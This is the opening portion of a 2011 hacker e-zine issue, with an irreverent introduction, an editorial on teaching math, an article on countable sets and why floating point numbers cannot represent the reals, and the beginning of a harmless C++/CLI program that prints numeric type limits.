` ` ` ` `
`-sdy+-` `` .sd/` `/ho` `:hdo` `:hd.
``./sdMMMMMMmy+-` .+dy .oNMMMh. `omMMMmo``:y- `/dMMMMm: `/dMMMm.
:hdNMMNdNNMMMMMMMMmhshNMMy +mMMMMMMN. .odNMMMMMMmdN/ `/dNNMMMMMN` `+dMMMMMMm`
/MMMMMm `-+sdNMMMMMMMMMMMy ..:NMMMMMysh/ `+NMMMMMM: :h/`:MMMMMMoomh/hMMMMMMy
/MMMMMm MMMMMM+::::. yMMMMMd: -MMMMMN MMMMMMMy- sMMMMMM-
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMs mMMMMM/
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMMM/
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo yMMMMN`
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo NMMMM:
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo sMMMN-
/MMMMMm MMMMMM- yMMMMM+ MMMMMN MMMMMMo oMMMh.
/MMMMMm `MMMMMM- yMMMMM+ MMMMMN MMMMMMo `yMMh:
/MMMMMN. `hMMMMMM- yMMMMMo MMMMMM MMMMMMo`+NNy-
/MMMMMMNh/.+mdNMMMMMs :mMMMMMN: MMMMMMs./- MMMMMMdmh+`
:yNMMMMMMNNo`-NMMMMMo .hMMMMMMMd. mMMMMMMms. :MMMMMdo.
`/hNMMMh. -mMMMMMy` -yMMMh/` .hMMMmo. :NMNh+.`
`sMm/ .hMMMMMm- -+-` `-o/` `yms/`
-dMy.``` `+NMMMMN. `dh.
`sNMNmmmmmmmdyo/::yMMMd` +M: `.
/mMMMMMMMMMMMMMMMNNmmy/` Go Null Yourself E-Zine :Md:` `omN+
yNNdhyso++oosyhmNNho-` :yhhyssoshdh+`
...` ``..` Issue #6 - Fall/November 2011 ``......`
www.GoNullYourself.org
[==================================================================]
0x01 Introduction
0x02 Editorials
0x03 Floating Point Numbers Suck dan
0x04 duper's Code Corner duper
0x05 How Skynet Works: An Intro to Neural Networks elchupathingy
0x06 Defeating NX/DEP With return-to-libc and ROP storm
0x07 A New Kind of Google Mining Shadytel, Inc
0x08 Stupid Shell Tricks teh crew
0x09 An Introduction to Number Theory dan
0x0a Information Security Careers Cheatsheet Dan Guido
0x0b Interview with Dan Rosenberg (bliss) teh crew
0x0c Et Cetera, Etc. teh crew
[==================================================================]
[==================================================================================================]
-=[ 0x01 Introduction
I wanted to write a dark and emotionally-provocative introduction for this issue. You know, like
the one in Phrack #67.
It's 2.00 a.m., nobody hits this machine at this time of the day.
Logs track me, but I'll clean them. I know this road, I know this feeling,
I recognize the shivering. Turn on the music, the game is on. I'm sure
someone else is around here, someone else has seen this # before.
"I'll fuck you if you don't fuck me first, sir". Fair enough, this
is the rule. I'll go to sleep afterwards. I'm meeting some friends and I've
to take a train tomorrow. I'll sleep on the couch of someone I've never
seen before, yet I know him well.
Yeah, something like that. Too bad I realized I suck at it. Oh well, screw it.
In its place, let's take a look at some of the gems over the past few months from the Twattersphere:
@TeaMp0isoN_ TriCk
u cant say shit to #TeaMp0isoN unless uv read phrack.org & gonullyourself.org/ezines
if u read them, u will then understand #TeaMp0isoN
6 Sep via web
@GregoryDEvans Gregory D. Evans
I can't hear my haters from up here in the Penthouse!
23 Aug via Twitterrific
@attritionorg attrition.org
[19:09] lyger: pro tip: putting chunks of bacon in coffee does not make bacon coffee.
it makes coffee with chunks of fat in it
9 Sep via TweetDeck
@shadytel Shady Tel
For a 35% discount, switch your Shadytel Internet service to Facebook-only today!
21 Sep via TweetDeck
There have also been many lolz to be had over at the Calibre project as of late:
https://bugs.launchpad.net/calibre/+bug/885027
If there's one thing we've learned from this experience, it's that broken designs are okay because
they're designed to be broken. And humbleness.
Kovid Goyal (kovid) wrote on 2011-11-02: #9
Sarcasm doesn't make me right, being right makes me right. The sarcasm was
just a bonus earned by the sanctimoniusness of the post I was responding to.
Additionally, much was learned about Jon Oberheide being a filthy, filthy troll:
Jon Oberheide (jon-oberheide) wrote 9 hours ago: #33
I'm not sure this is actually exploitable...the posted exploit fails on my GNU/kFreeBSD box:
$ gcc 70calibrerassaultmount.sh -o full-nelson
70calibrerassaultmount.sh: file not recognized: File format not recognized
$ ./full-nelson
-bash: ./full-nelson: No such file or directory
Is there different compiler (icc?) or architecture (maybe needs a RISC arch?) requirement?
Context, people. Context.
Moving on, it seems that one of the more prevalent themes in conference media coverage this year has
certainly been the recruiting of hackers by the federal government. This is most likely due to
presentations given by Mudge (of l0pht fame) promoting Cyber Fast Track, a DARPA initiative that
offers funding and resources for individuals' security projects.
Of course, the average dumbfuck always has something to say about dem h4xx0rs in our g0v3rnm3ntz.
http://www.cbsnews.com/stories/2011/08/06/eveningnews/main20089116.shtml
by Americank17 August 6, 2011 8:48 PM EDT
it shows how backward they are in internet technology! and how desperate they are to
become players in the hackers(idiots)game! These hackers go about scamming and spamming
and dropping viruses all over the internet! This is the most absurd action that these
Feds have taken!
by train99 August 7, 2011 5:47 PM EDT
How are you ever going to eliminate hacking as an illegal activity if you give awards
and jobs to people who do it best?
What a sick, sick country.
by Harden_Tar August 7, 2011 6:14 AM EDT
We are the country that invented the nerd and we should get the best and brightest of
them to go kick China's butt back to the Pentium I days. I don't care if they have blue
and orange hair and a couple dozen facial piercings. Pay them, give them the best gear,
unlimited Skittles, and turn them loose.
Not sure what to say to that... I like Skittles...
Anyways, we've got a good issue this quarter. But don't let us tell you about it.
Just go fucking read it.
Notable Events
==============
July 17, 2011 - Boris Sverdlik publicly burns his CISSP certification
August 4, 2011 - Cyber Fast Track program announced at Blackhat USA 2011
August 28, 2011 - Realization of rogue certificates issued by CA DigiNotar
August 31, 2011 - kernel.org compromised
September 13, 2011 - Microsoft unveils Windows 8
September 21, 2011 - Windows 8 ROP exploit mitigation is defeated
October 5, 2011 - Steve Jobs dies
-=-=-
Now, on to formalities...
If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
way are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.
Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:
- IRC private message (storm or elchupathingy @ irc.gonullyourself.org #gny)
- Reddit (stormehh @ reddit.com/r/gny)
- Email (zine@gonullyourself.org)
If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is
available for use below.
We have put a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.
Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
behavior in any way.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.11 (GNU/Linux)
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
8QJQ4gF00KrsCCSrPyg/cZ5G
=g7oJ
-----END PGP PUBLIC KEY BLOCK-----
[==================================================================================================]
-=[ 0x02 Editorials
We're going to try something different this issue. If you have an opinion and the ability to
coherently piece together nouns and verbs into sentences, then the Editorials section may be for
you. Please consult your doctor before exercising your right to free speech, as this may cause
adverse side-effects.
We may be contacted at: zine@gonullyourself.org
(PGP key is available in the Introduction)
Please note that emails we like will be published in future issues, so specify if you wish for your
message to remain private or if you wish for us to redact certain personal information from it.
----------------------------------------------------------------------------------------------------
[[ Author: dan
[[ IRC: irc.gonullyourself.org #gny
>> Note from GNY Staff:
>> To provide context to this editorial, dan has submitted two mathematics-based articles to this
>> zine issue.
Let's talk:
The number theory article in this issue covers several things you'd learn in the first chapter of a
number theory book. I didn't write it because I thought I understood the material better than those
books, or because I thought you poor starving Internet kids couldn't find access to this
information. Although it is kinda cool to say I'm going to get an article in GNY, I didn't do
it for that reason either. Look here kids, including mathematics articles in this zine (or any
other) is an awesome idea, but we need to be honest with ourselves. We're not going to be
publishing any original research here, so pretty much anything we write will be derivative. So, if
math is a good thing to publish in GNY, but there won't be any new math published, then what's the
point? The point is we can do it differently. We don't have to teach it like old stuffy professors
who bored us to death in school. We can actually attempt to make intuitive sense of things that
otherwise look like gibberish.
Look at Wikipedia's RSA article, or the article on RSA from the last issue. Both, of course, are
very formal. In its worked RSA example, Wikipedia computes Phi(p*q) = (p - 1)*(q - 1).
Now that we know what the Phi function is after reading the number theory article, does the above
line make any sense to us? It's using a special trick: p and q are both prime, and there's a
theorem that says the above is true in that case. But we never see that Phi(p*q) just counts the
numbers less than p*q that are relatively prime to it. That's fine, since Wikipedia is supposed to
be formal.
Similarly, in the last RSA article we didn't even get an explanation of Euler's Phi function, just a
convoluted (but efficient) way of finding the answer.
The only way we can include mathematics without adding pointlessness to zines is to start trying to
give intuitive, human understandable explanations. The advantage we have over textbooks and working
mathematicians is we don't have to be rigorous, we don't have to be formal. Yeah, those things are
needed, but don't worry, the professionals got that covered. Let's just have fun with it, and try
to actually comprehend what's going on.
So, I threw in an explanation of Inverses in Modular Arithmetic randomly at the very end. That's
because that was the only thing that was missing in explaining to you every mathematical concept you
need to know to see what is going on in RSA.
Of course, actually writing an implementation would require much more efficient algorithms than the
naive ones we'd probably implement after reading this article. Also, notice I said the concepts
going on "in" RSA, not the concepts needed to understand RSA. For that you'd need to learn more
concepts.
There's some old folklore about being a better programmer that involves hitting "s" instead of "n"
while in a debugger. Similarly, to be a better mathematician it's good to step into the theorems
and see what's going on. How deep you want to go depends mainly on your interest. Don't feel bad
if you enjoy learning mathematics without the proofs. Understanding with higher levels of
abstraction is how we advance.
Make math fun, that's original content.
[==================================================================================================]
-=[ 0x03 Floating Point Numbers Suck
-=[ Author: dan
-=[ IRC: irc.gonullyourself.org #gny
On the fact that floating point numbers are stupid, and I hate them.
If you've been a computer programmer for more than a month, chances are you've been bitten by some
sort of error you weren't expecting when using floating point numbers. You probably chalked this up
to rounding error, or took the time to read one of those exceptionally boring articles about things
you should know about floating point numbers. The interesting thing is there is a very theoretical
reason based on pure mathematics that explains why floating point numbers are so stupid, and why we
can't do any better.
Before we can explain why floating point numbers are stupid using math, we first need to learn a few
basic mathematical concepts.
Set: a set is a collection of objects, where each object must be unique. Usually members or
elements of a set are written inside of curly braces.
{1,2,3} is a set, since it contains distinct objects.
The integers also form a set, as they contain every positive and negative whole number, as well as
zero.
Sets don't really have to have anything to do with numbers. The collection of every dog on the
planet can also represent a set.
Function: In mathematics, a function, sometimes called a mapping, is a list of rules that associates
each element of one set with an element of another set (or of the same set), satisfying the
following property: for every input, there can be only one output.
Here's an example of a function, written in standard mathematical notation.
Let A = {1,2,3}
Let B = {4,5,6}
Let f:A->B such that f(1) = 4, f(2) = 5, f(3) = 6
The notation f:A->B means "f is a function (or mapping) that takes an element of the set A and
associates it with an element of a set B." We then define the rules to tell us which element of A
goes to which element of B. f(1) = 4 means that the element 1 of set A gets mapped to the element 4
of set B.
A mapping, as mentioned above, can also go from a set to itself.
Consider the following:
Let A = {1,2,3}
g:A->A such that g(1) = 3, g(2) = 2, g(3) = 1
This can be interpreted as "g is a mapping that takes an element of the set A and associates it with
an element of the set A." Although we won't discuss it here, the above function is actually a
permutation, a concept used quite a bit in higher mathematics.
Let's do just a few more examples.
Let A = {1,2,3}
Let f:A->A such that f(1) = 1, f(2) = 1, f(3) = 1.
Let g:A->A such that g(1) = 1, g(1) = 2, g(2) = 2, g(3) = 3.
In the above example, f is a function, while g is not. Remember above we said that for something to
be a function, then for every input there must be only one output. Well, look at g, g(1) = 1, and
g(1) = 2. That's two different outputs for one input, so not a function. f is a valid function
since it meets the property that every input goes to only one output, even though the output is
the same every time.
Ok, one final function:
Let N be the set of natural numbers. The natural numbers are sometimes called the counting numbers,
because they contain only the numbers you normally count with. 1,2,3,...
Let f:N->N such that, f(1) = 1, f(2) = 2, f(3) = 3, ...
Another way to write the rules for the above function would be f(x) = x. This function definition
should be understandable to you if you have any experience programming. This function actually has
a special name; it's called the identity function, because it maps each element to itself.
Now, we just need to learn about one special type of function, often called injective functions, or
one-to-one functions. A function is injective if different inputs always go to different outputs. Let's go
back to a previous example.
Let A = {1,2,3}
Let f:A->A such that f(1) = 1, f(2) = 1, f(3) = 1.
While f is a function, with every input going to only one output, it is not an injective function
since each input does not go to a different output.
Let A = {1,2,3}
g:A->A such that g(1) = 3, g(2) = 2, g(3) = 1
This (along with several of our previous examples) would be an injective function.
We're almost ready to learn why floating point numbers are stupid. We just have one more concept we
need to cover.
Countable sets: a set is countable... if you can count the elements inside of it.
The above is the non-mathematical notion of a countable set, and while it's intuitive, it can make
us think about things incorrectly when dealing with infinite sets. So now we're going to talk about
the mathematical definition of a countable set.
Countable sets: a set S is countable if there exists an injective function f:S->N, where N is the
natural numbers. Take a few minutes to think about this. This basically says a set is countable if
there is a function that takes each element of that set and maps it to its own natural number (one
of the counting numbers). It's pretty much a fancy way of saying a set is countable if you can count
the elements inside of it.
The reason the function has to be injective is because, otherwise, you're not really counting
anything. Consider f:A->N, where A = {1,2,3}, such that f(x) = 1.
Then f(1) = 1, f(2) = 1, f(3) = 1. This is a function from a set to the natural numbers, but you
haven't really counted anything. Now if you force the function to be injective, each output is
unique, so once the output of 1 is used up, it can never appear again.
We can prove that A = {1,2,3} is a countable set by defining an injective function from A to the
natural numbers. Here we go:
Let g:A->N such that g(x) = x.
Then g(1) = 1, g(2) = 2, g(3) = 3. Notice how it seems we actually counted the elements of the set
A. We've also proved that A is a countable set.
Now let's use the same strategy to come up with some mind-bending results about countable sets.
Let N be the set of natural numbers.
Let f:N->N, such that f(x) = x.
So f(1) = 1, f(2) = 2, f(3) = 3,...
So there we have it. Probably not surprising that we can map the natural numbers to the set of
natural numbers easily. The interesting thing here is that this is the first countable set we've
seen that's infinite, often referred to as countably infinite. Yep, we just counted an infinite set
(this is the reason why the intuitive non-mathematical definition can start to fall apart).
Now let's look at the set of integers which we'll call Z. Surely, the integers can't be countable -
I mean there's totally like twice as many of them as there are natural numbers!... Let's find out:
Let f:Z->N, such that
f(0) = 1
f(-1) = 2
f(1) = 3
f(-2) = 4
f(2) = 5
.
.
.
We can see from this that it's possible to make an injective function that maps the integers to the
natural numbers, meaning the integers are in fact countably infinite. A similar example can be given
to show that the set of rational numbers is countably infinite. This will be omitted since the
construction is best shown pictorially.
Before we go any further, let's talk about cardinality.
Cardinality: fancy math term to say how big something is, usually described in notation as |A|,
which means "cardinality of a set A." The choice of the same symbols as absolute value is fitting,
since absolute values tell us how big something is. The idea of cardinality is fairly simple for
finite sets.
Let A = {1,2,3}
|A| = 3
Let B = {4,5,6}
|B| = 3
Let C = {1,5,7,9}
|C| = 4
Things get a bit weirder when talking about infinite sets. You see, the mind-bending thing that
happens when you talk about countability is that when you've shown a set is countably infinite,
you've shown it is exactly as big as the natural numbers. So, believe it or not, this means from
what we've seen above that there are exactly as many integers (and rationals) as there are natural
numbers. Basically, |N| = |Z|. To describe the size (cardinality) of a countably infinite set,
we say |N| = aleph-null (written in original Hebrew lettering). Some GNY readers might recognize
the name aleph-null as similar to the handle of an author of a very well-known paper in computer
security.
I'll stop with the countable sets now, but just to bend your mind a bit more, you can show that the
even numbers, odd numbers, primes, and many other things are countably infinite, which means they're
exactly the same cardinality as the natural numbers.
So, we're finally getting close to talking about those pesky floating points. Let's begin by
talking about real numbers. The set of real numbers is usually denoted as the set R.
Real numbers are slightly harder to define, but a good basic understanding can be had by saying that
it's the set of all numbers that can be written using decimal notation, including decimals that go
on forever. 0, 1, 1.1, 2.1234123412341, -50000.13412341341, 2000, 78 are all examples of real
numbers. Floating point numbers are designed to emulate these numbers; unfortunately, they have some
problems with this.
Let's see what the big problem is by trying to count the real numbers.
For them to be countable, we need to find an injective function: f:R->N. Well, let's give it a
shot...
f(0) = 1 ; woo!
f(0.1) = 2, wait or maybe it should be f(.001) = 2, or maybe f(.0001) = 2,
or maybe f(.0000000000000000000000000000000000000000001) = 2.
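Maybe you're starting to see the problem here: real numbers have a property that says if you're
given any two real numbers, there's an infinite number of real numbers between them. No matter how
close you pick two real numbers to be, there's always going to be stuff in the middle. We didn't
have this problem with natural numbers or integers. Pick any two integers or natural numbers, and
there's only a finite number of numbers between them. To be fair, this alone isn't a proof: the
rationals have the same property, and we said above that they're countable. The actual proof that no
counting scheme can ever work for the reals is Cantor's diagonal argument, which we'll skip here.
The upshot is the same: what we have discovered with the real numbers is our first uncountable set.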
Uncountable sets can even make a bit of sense when talking about cardinality. Uncountable sets are
bigger than countably infinite sets. Therefore, |N| < |R|, which is easier for us to wrap our heads
around.
Now, let's talk about some fun facts about uncountable and countable sets. We saw earlier that we
couldn't injectively map the real numbers to the natural numbers; more generally, we can say it's
impossible to create an injective map from an uncountably infinite set to a countably infinite set.
That, in a nutshell, is what's wrong with floating point numbers.
You see, computers represent all of their data using the binary numbering system. You can think of
these binary numbers as integers, or natural numbers - it doesn't really matter. What matters is
that the binary numbers we use to represent things are countable. So, in order for a computer to
represent real numbers, it must come up with a way of mapping real numbers to binary numbers, which
is equivalent to mapping an uncountable set to a countable set: it simply can't be done. For this
reason, it's impossible for us to ever have a completely accurate way of representing real numbers,
so long as we're using binary inside of computers.
Now, think about this. Floating point numbers are mapping some real numbers to the binary digits
our computer uses, which are countable. If a set can be mapped injectively to a countable set, then
it is in fact countable. The only way we could even begin to try and use real numbers on a computer
is to limit ourselves to a subset of the real numbers, and to deal with the "problem" real numbers
have. That problem being that for any two real numbers, there's an infinite number of real numbers
between them. That isn't true for floating point numbers used on computers. Computers have what's
referred to as "machine epsilon," which is the gap between 1 and the next larger number a floating
point type can represent. For a 64-bit double, that gap is about 2.22045*10^-16: the first floating
point after 1 is 1 + 2.22045*10^-16, and there is nothing in between. The gaps shrink as you get
closer to 0 and grow as the numbers get bigger, but they never go away.
Everything that falls in a gap gets rounded to one of its neighbors.
One solution to the floating point numbers problem would be the use of analog computers (or "real
computers"). Wikipedia briefly explains this concept:
Computer theorists often refer to idealized analog computers as real computers (because they
operate on the set of real numbers). Digital computers, by contrast, must first quantize the
signal into a finite number of values, and so can only work with the rational number set (or,
with an approximation of irrational numbers).
These idealized analog computers may in theory solve problems that are intractable on digital
computers; however as mentioned, in reality, analog computers are far from attaining this ideal,
largely because of noise minimization problems. In theory, ambient noise is limited by quantum
noise (caused by the quantum movements of ions). Ambient noise may be severely reduced - but
never to zero - by using cryogenically cooled parametric amplifiers. Moreover, given unlimited
time and memory, the (ideal) digital computer may also solve real number problems.
- http://en.wikipedia.org/wiki/Analog_computer
---------------------------------------------------------------------------
N, Z, and R are usually written in blackboard bold. You can
see examples of this in Wikipedia or with LaTeX by using \mathbb{N},
\mathbb{Z}, \mathbb{R}. Similarly, the Hebrew letter Aleph is usually
written in its original form with a subscript of 0 to represent the
"null" part.
[==================================================================================================]
-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/
/******************************************************************************
******************************************************************************/
.^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%,
= %
% HaXNeT #PrOjECtS PrOdUcTiOnZ PReSeNtS: =
= %
`^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%=^=%'
o Oo o
O oO O
o O o
o o' o
.oOoO O o .oOo. .oOo. `OoOo. .oOo .oOo .oOo. .oOoO .oOo.
o O o O O o OooO' o `Ooo. O O o o O OooO'
O o O o o O O O O o o O O o O
`OoO'o `OoO'o oOoO' `OoO' o `OoO' `OoO' `OoO' `OoO'o `OoO'
O
o'
.oOo .oOo. `OoOo. 'OoOo. .oOo. `OoOo.
O O o o o O OooO' o
o o O O O o O O
`OoO' `OoO' o o O `OoO' o ......
/******************************************************************************
*****************************************************************************/
/******************************************************************************
ISO/IEC 14882:2011 (a.k.a. C++11) is PUBLISHED!! || Can't speak? Identify to NickServ || http:
16:48 -!- killerboy [~mateusz@users69.kollegienet.dk] has joined ##c++
16:48 < Cecen> Yeah, I know VS offers name() and raw_name()
16:49 -!- artiintell [~artiintel@host86-144-19-6.range86-144.btcentralplus.com] has joined ##c++
16:49 < Cecen> I figured raw_name was an extension
16:49 < V-ille> raw_name is an ext.. yep
16:49 < notNicolas> How do you get typeid?
16:49 < Cecen> typeid(something)
16:49 -!- jhunold [~hunold@pD9FD714A.dip.t-dialin.net] has quit [Remote host closed the
connection]
16:49 < V-ille> { struct X {}; cout << typeid(X).name() ; }
16:49 < geordi> main::X
16:49 -!- Neptu [~Neptu@195-67-240-87-no53.tbcn.telia.com] has joined ##c++
16:49 < notNicolas> Cool.
16:50 < notNicolas> Is it a sibling of typeof?
16:50 < V-ille> { struct X {}; X x; cout << typeid(x).name() ; } // alternatively, from a
variable
16:50 < geordi> main::X
16:50 < V-ille> there is no typeof
16:51 -!- mgaunard_ [~mgaunard@2a01:e35:8a4f:ffa0:56e6:fcff:fe93:6b6a] has quit [Ping timeout:
240 seconds]
16:51 < notNicolas> Hmm I thought I saw it at one point.
16:51 < V-ille> typeof is an extension
16:51 < V-ille> found in gcc at least
16:51 -!- MrSassyPants [~DURR@80-218-127-234.dclient.hispeed.ch] has quit [Remote host closed
the connection]
16:51 -!- Blahh_ [Blahh_@86-42-78-19-dynamic.b-ras1.blp.dublin.eircom.net] has joined ##c++
16:52 -!- borisbn [~borisbn@213.138.92.144] has quit [Quit: QIP Infium IRC
protocol->http://forum.qip.ru]
16:52 -!- FrameFever [~Miranda@ppp-93-104-60-55.dynamic.mnet-online.de] has quit [Quit: Miranda
[17:06] [duper`(+Zi)] [2:net/##c++(+CPcflnpt #overflow 777)] [Act: 1] -- more --
[##c++]
*******************************************************************************/
//
// C++/CLI Type Attribute Examiner by duper <super@deathrow.vistech.net> for GNY
//
// Tested in Microsoft Visual Studio 2010 Ultimate on Windows 7 Home Premium SP1
//
#include"stdafx.h" // empty
#include<iostream>
#include<iomanip>
#include<limits>
#include<string>
#include<sstream>
#include<typeinfo>
using namespace std;
using namespace System;
/// <para><summary>This is the prototype declaration for the primary type examination class which
/// does most of the work for this program; particularly the definition of the constructor method:
/// <see cref="TypeExamine::TypeExamine">TypeExamine::TypeExamine</see>.</summary>
/// <remarks>Since the code is written in C++/CLI, it has the ability to examine characteristics of
/// both unmanaged C++0x types and managed type data within the Microsoft .NET Framework's Common
/// Language Runtime.</remarks></para>
template< class T >
class TypeExamine {
public:
TypeExamine();
~TypeExamine();
};
public ref struct CodeConfig {
literal int num_width = 20;
literal int bool_width = 8;
};
template< class T >
TypeExamine<T>::TypeExamine() {
T a;
string typeName = string(typeid(a).name());
CodeConfig codeConfig;
cout << typeName << endl;
cout.setf(ios::left, ios::adjustfield);
cout.unsetf(ios::scientific);
cout << "min: " << setw(codeConfig.num_width) << numeric_limits<T>::min() << ' ';
cout << "max: " << setw(codeConfig.num_width) << numeric_limits<T>::max() << ' ';
cout << "digits: " << setw(codeConfig.num_width) << numeric_limits<T>::digits << endl;
cout << "is_signed: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_signed << ' ';
cout << "is_integer: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_integer << ' ';
cout << "is_exact: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_exact << ' ';
cout << "is_specialized: " << setw(codeConfig.bool_width) << numeric_limits<T>::is_specialized;
cout << endl << endl;
}
template< class T >
TypeExamine<T>::~TypeExamine() {
}
[STAThread]
static int main(array<System::String ^> ^args)
{
TypeExamine<bool> typeExam_bool;
TypeExamine<char> typeExam_char;
TypeExamine<unsigned char> typeExam_uchar;
TypeExamine<wchar_t> typeExam_wchar_t;
TypeExamine<int> typeExam_int;
TypeExamine<unsigned int> typeExam_uint;
TypeExamine<short> typeExam_short;
TypeExamine<unsigned short> typeExam_ushort;
